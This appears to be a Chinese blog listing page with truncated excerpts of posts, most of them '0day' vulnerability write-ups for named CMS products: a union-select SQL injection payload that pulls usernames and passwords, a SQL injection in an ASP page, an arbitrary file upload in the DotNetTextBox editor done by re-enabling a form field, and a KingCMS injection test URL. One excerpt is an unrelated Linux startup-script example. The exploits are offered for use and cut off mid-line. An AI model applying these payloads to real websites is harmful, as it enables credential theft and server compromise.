-
启航通信企业建站CMS系统v1.9漏洞0day
漏洞一:s新闻页面 具体EXP:javascript:alert(document.cookie=”id=”+escape(“220 union select 1,username,passwor...
-
ShyPost企业网站管理系统 v8.3 最新漏洞0day
漏洞一:sql字符型注入Aboutus.asp页面<%Title=Trim(request(“Title”)) //request获取title标题,只是简单过滤了空格。Set rs = Server.Cr...
-
Linux添加开机启动
修改/etc/rc.local下面是rc.local的一个例子 touch /var/lock/subsys/localmodprobe bondingnohup /home/rsync.sh &rsync --daemon/hom...
-

DotNetTextBox编辑器洞洞,可上传任意文件
DotNetTextBox编辑器洞洞文件上传漏洞 1、用firebug将disabled="disabled',value="jgp,gif,png"修改为enabled="enabled"...
-

KingCMS 1.0 SQL Injection漏洞
官网:http://www.kingcms.com/ EXPhttp://127.0.0.1/kingcms_php_1.0/index.php/list-13 and 1=1-1.html...